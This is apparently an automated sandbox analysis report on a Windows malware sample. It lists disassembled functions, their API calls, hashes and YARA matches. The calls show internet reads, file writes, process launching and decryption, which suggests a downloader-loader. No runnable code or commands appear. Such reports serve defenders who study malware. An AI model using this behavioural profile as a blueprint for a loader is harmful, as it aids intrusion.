                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                  • String ID: text
                                                  • API String ID: 1154000607-999008199
                                                  • Opcode ID: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                                  • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                  • Opcode Fuzzy Hash: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                                  • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90
                                                  Function 10001F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                    • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: .exe$open
                                                  • API String ID: 1627157292-49952409
                                                  • Opcode ID: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                                  • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                  • Opcode Fuzzy Hash: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                                  • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62
                                                  Function 00401D20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1411 401d20-401d6e 1412 401d72-401d77 1411->1412 1412->1412 1413 401d79-401fd3 call 402460 call 402640 call 402460 call 40e400 call 411414 InternetOpenA 1412->1413 1428 401fd5-401fe1 1413->1428 1429 401ffd-40201a call 40cd83 1413->1429 1430 401ff3-401ffa call 40cfc3 1428->1430 1431 401fe3-401ff1 1428->1431 1430->1429 1431->1430 1433 402022-402059 call 411337 call 401d20 1431->1433
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: http://
                                                  • API String ID: 0-1121587658
                                                  • Opcode ID: 6907100a034e059a4106fe1f63b2c5033b6593f1fce55d5f4e41db25ecc671bd
                                                  • Instruction ID: 400ae1f0683e16050dc0c92ac0c9e39ab50ada623451b1719e06fb015b7fc8db
                                                  • Opcode Fuzzy Hash: 6907100a034e059a4106fe1f63b2c5033b6593f1fce55d5f4e41db25ecc671bd
                                                  • Instruction Fuzzy Hash: 9551C171E002099FDB14CFA8C885BEEBBB5EF48714F20812AE811B72D1D7799945CBA4
                                                  Function 00402080 Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1442 402080-40209b 1443 4020fb-40210c call 40cd83 1442->1443 1444 40209d-4020a1 1442->1444 1444->1443 1445 4020a3-4020c1 CreateFileA 1444->1445 1445->1443 1447 4020c3-4020f0 WriteFile CloseHandle call 40cd83 1445->1447 1450 4020f5-4020f8 1447->1450
                                                  APIs
                                                  • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020B6
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 004020D7
                                                  • CloseHandle.KERNEL32(00000000), ref: 004020DE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleWrite
                                                  • String ID:
                                                  • API String ID: 1065093856-0
                                                  • Opcode ID: 9a7e1187f18d3ebfa534ae983d304b852045277601f3c95029d7f3444259bd02
                                                  • Instruction ID: 6c77038d191d3f97727d8eed6fdb37873f2ee397ff2ea2baf70002bfc895bc0c
                                                  • Opcode Fuzzy Hash: 9a7e1187f18d3ebfa534ae983d304b852045277601f3c95029d7f3444259bd02
                                                  • Instruction Fuzzy Hash: AA01DB31601204EBD730DB68DD49BAEB7A4EB48720F40413EFA45A61D0CEB46945DB98
                                                  Function 00660E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00000400,?,?,00660223,?,?), ref: 00660E19
                                                  • SetErrorMode.KERNELBASE(00000000,?,?,00660223,?,?), ref: 00660E1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction ID: ee078584dca13e788e7d6e14266956c172b54066e7d8b192639a4a5066c8a46f
                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction Fuzzy Hash: 8CD0123154512877D7002A94DC09BCE7B1CDF05B62F008421FB0DD9180C771994046E5
                                                  Function 0041A395 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: a8f23313f6675ffa9e48e163953c56306ede8fe599d825346f1131c99d372f44
                                                  • Instruction ID: 892a2f85d179e940e32edf4c269616ac7a5d26f5bdb6421d04aa5267c10937ef
                                                  • Opcode Fuzzy Hash: a8f23313f6675ffa9e48e163953c56306ede8fe599d825346f1131c99d372f44
                                                  • Instruction Fuzzy Hash: 39E02B31643228E6D7212726AC00BDBB6499F417B0F550127FC64D2291CF6CDCD1C1AF
                                                  Function 100079EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                  • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                  • Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                  • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                  Function 00413388 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 0041339B
                                                    • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                    • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast_free
                                                  • String ID:
                                                  • API String ID: 1353095263-0
                                                  • Opcode ID: c45df409a2209a6dae7faf0f0439407c1fc408f0f17bd796a6383b085c05d1ef
                                                  • Instruction ID: 55f22833085c7284391f6abc04ff7850bc4061f265e97900bf2c914d8fb6d659
                                                  • Opcode Fuzzy Hash: c45df409a2209a6dae7faf0f0439407c1fc408f0f17bd796a6383b085c05d1ef
                                                  • Instruction Fuzzy Hash: CFC08C3110020CBBCB00DB42C806A8E7BA8DB80368F200048F40017240CAB1EE409694
                                                  Function 10005BF4 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 10005C07
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast_free
                                                  • String ID:
                                                  • API String ID: 1353095263-0
                                                  • Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                  • Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
                                                  • Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                  • Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691
                                                  Function 007747C0 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00774811
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0076F000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_76f000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction ID: 75346193475ec7ef146632e383a6d46e01430c9a726db5e625ea47b45e178b98
                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction Fuzzy Hash: E3112A79A40208EFDB01DF98C989E99BBF5AB08351F0580A4F9489B362D375EA50DB80
                                                  Function 00402BE0 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00402BEF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 13b5f206aa341d0fbaeb0a1724a0e1e5cbc72d21563ec56196b404c9d5a1e8b3
                                                  • Instruction ID: 757219c421bd17c9bacb0b6147dd7d19cb6d4b5150cd33f247450a4ef3d9d6e3
                                                  • Opcode Fuzzy Hash: 13b5f206aa341d0fbaeb0a1724a0e1e5cbc72d21563ec56196b404c9d5a1e8b3
                                                  • Instruction Fuzzy Hash: B6C0483204420DFFCF025F81EC04C9E3F2AFB08260B448024FA1824030CB339931AB95
                                                  Function 00402C00 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 00402C0C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FreeVirtual
                                                  • String ID:
                                                  • API String ID: 1263568516-0
                                                  • Opcode ID: 60f6fe46419e245ea3fe1cb545ffcffb3b8132432e166037cb3dc50b65685cfd
                                                  • Instruction ID: 453d66be5c1bbbae9c6a98f4a0570dcf14d6ac7d0ccfee59b5e1430b94dd3887
                                                  • Opcode Fuzzy Hash: 60f6fe46419e245ea3fe1cb545ffcffb3b8132432e166037cb3dc50b65685cfd
                                                  • Instruction Fuzzy Hash: 56B0923200020CFBCF021F81EC0489D3F2AFB08260B448024FA1C44031CB339571AB84

                                                  Non-executed Functions

                                                  Function 00663717 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 232encryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,00437018), ref: 00663797
                                                  • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 006637BB
                                                  • _mbstowcs.LIBCMT ref: 0066380E
                                                  • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 00663825
                                                  • GetLastError.KERNEL32 ref: 0066382F
                                                  • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00663857
                                                  • GetLastError.KERNEL32 ref: 00663861
                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00663871
                                                  • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 00663933
                                                  • CryptDestroyKey.ADVAPI32(?), ref: 006639A5
                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00663A25
                                                  Strings
                                                  • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00663773, 00663A0A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
                                                  • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                  • API String ID: 4265767208-63410773
                                                  • Opcode ID: 9a155a2b7c47821049898c79bfb8f12405dbdff61417cc380cd6b9e646117a85
                                                  • Instruction ID: b6497fc807aa8e6c8b8dd160c9887a5079ba5be176e1786da1b656298d3e2a55
                                                  • Opcode Fuzzy Hash: 9a155a2b7c47821049898c79bfb8f12405dbdff61417cc380cd6b9e646117a85
                                                  • Instruction Fuzzy Hash: 4D816D71A00228AFEB209F25CC45B9EBBB6EF45310F5081A9F54DE7381EB719E848F55
                                                  Function 006690C7 Relevance: 14.6, APIs: 5, Strings: 3, Instructions: 601COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0066924B
                                                  • __Init_thread_footer.LIBCMT ref: 006694E5
                                                  • __Init_thread_footer.LIBCMT ref: 00669331
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  • __Init_thread_footer.LIBCMT ref: 006696D6
                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 006698A4
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$Init_thread_footer$EnterLeave$FileIos_base_dtorModuleNamestd::ios_base::_
                                                  • String ID: P:C$ZYA.$kc~z
                                                  • API String ID: 1348255701-279448249
                                                  • Opcode ID: 10e198ffe07126ebbc5d9e4083672b07ced8549812fe91e39b1e8414d8359049
                                                  • Instruction ID: 1f79a84b63d58f6d006d73b39b755c6200ec92dd5aba044d414113285bc8b3dd
                                                  • Opcode Fuzzy Hash: 10e198ffe07126ebbc5d9e4083672b07ced8549812fe91e39b1e8414d8359049
                                                  • Instruction Fuzzy Hash: D8420470A002449BDB18DF28DC99BE9B7B6BF49304F1042DCE8499B392DB71AE84CF55
                                                  Function 00420E93 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00417A23,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00420F54
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00417A23,?,?,?,00000055,?,-00000050,?,?), ref: 00420F7F
                                                  • _wcschr.LIBVCRUNTIME ref: 00421013
                                                  • _wcschr.LIBVCRUNTIME ref: 00421021
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004210E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                  • String ID: utf8
                                                  • API String ID: 4147378913-905460609
                                                  • Opcode ID: ec97581227958269d26a21896a7a43edb4bdbbe001f50202358ae53c9e406f2b
                                                  • Instruction ID: bacd77ab9f109c2ce2fb904c5d91b5ba267ea5c699df71e4fc18565647c60fab
                                                  • Opcode Fuzzy Hash: ec97581227958269d26a21896a7a43edb4bdbbe001f50202358ae53c9e406f2b
                                                  • Instruction Fuzzy Hash: F4712831700321AAD734AB35EC86BBB73E8EF54704F55442BF505D7292EABCD8818668
                                                  Function 00422ED9 Relevance: 10.3, APIs: 1, Strings: 4, Instructions: 1522COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: b5db4dd6549a24109d46b2c60a41c5217e0e4334f21777dec3ab2f9fc6fd95f1
                                                  • Instruction ID: 41dc3819fad2d9129b81c787e7835a844f779ca96fe732548fe2c0b5b3ddb6ba
                                                  • Opcode Fuzzy Hash: b5db4dd6549a24109d46b2c60a41c5217e0e4334f21777dec3ab2f9fc6fd95f1
                                                  • Instruction Fuzzy Hash: 2CD22871E082288FDB65CE28ED407EAB7B5EB85315F5441EBE80DE7240D778AE818F45
                                                  Function 0042161F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,0042193D,00000002,00000000,?,?,?,0042193D,?,00000000), ref: 004216B8
                                                  • GetLocaleInfoW.KERNEL32(00000000,20001004,0042193D,00000002,00000000,?,?,?,0042193D,?,00000000), ref: 004216E1
                                                  • GetACP.KERNEL32(?,?,0042193D,?,00000000), ref: 004216F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                  • Instruction ID: 8acf744a58ce8a7ab2eb5bb327c39e73a43266cf4ebd95a2e37211785a4fc039
                                                  • Opcode Fuzzy Hash: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                  • Instruction Fuzzy Hash: ED219561700125A7D7348F54E901E9F73A6AF70B50FDE8466E806C7220E77ADD41C35C
                                                  Function 00681886 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,00681BA4,00000002,00000000,?,?,?,00681BA4,?,00000000), ref: 0068191F
                                                  • GetLocaleInfoW.KERNEL32(00000000,20001004,00681BA4,00000002,00000000,?,?,?,00681BA4,?,00000000), ref: 00681948
                                                  • GetACP.KERNEL32(?,?,00681BA4,?,00000000), ref: 0068195D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                  • Instruction ID: 7cf2c830eb13dced599d0560a85319aa000e676f9ba4913a4f5e861da41c260a
                                                  • Opcode Fuzzy Hash: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                  • Instruction Fuzzy Hash: 5421A772B00105AAEF34AB54D951AD773AFEF56B54B568624E90EDF200E731DE43C350
                                                  Function 006810FA Relevance: 7.8, APIs: 5, Instructions: 251COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00677C8A,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 006811BB
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00677C8A,?,?,?,00000055,?,-00000050,?,?), ref: 006811E6
                                                  • _wcschr.LIBVCRUNTIME ref: 0068127A
                                                  • _wcschr.LIBVCRUNTIME ref: 00681288
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00681349
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                  • String ID:
                                                  • API String ID: 4147378913-0
                                                  • Opcode ID: 2a6404712282db71a29471be0cd7d31724836b51377f739b85fde7269eafe9cd
                                                  • Instruction ID: 498d25432a92c126333c42773a48ebbf21089e6d1ab5fe775c0a508fbafbcc0d
                                                  • Opcode Fuzzy Hash: 2a6404712282db71a29471be0cd7d31724836b51377f739b85fde7269eafe9cd
                                                  • Instruction Fuzzy Hash: 11712B31600206ABEB64BB74CC56FBA73AEEF46700F14463DF545DF281EA70DA828764
                                                  Function 004217F4 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                    • Part of subcall function 00418E23: _free.LIBCMT ref: 00418E85
                                                    • Part of subcall function 00418E23: _free.LIBCMT ref: 00418EBB
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00421900
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00421949
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00421958
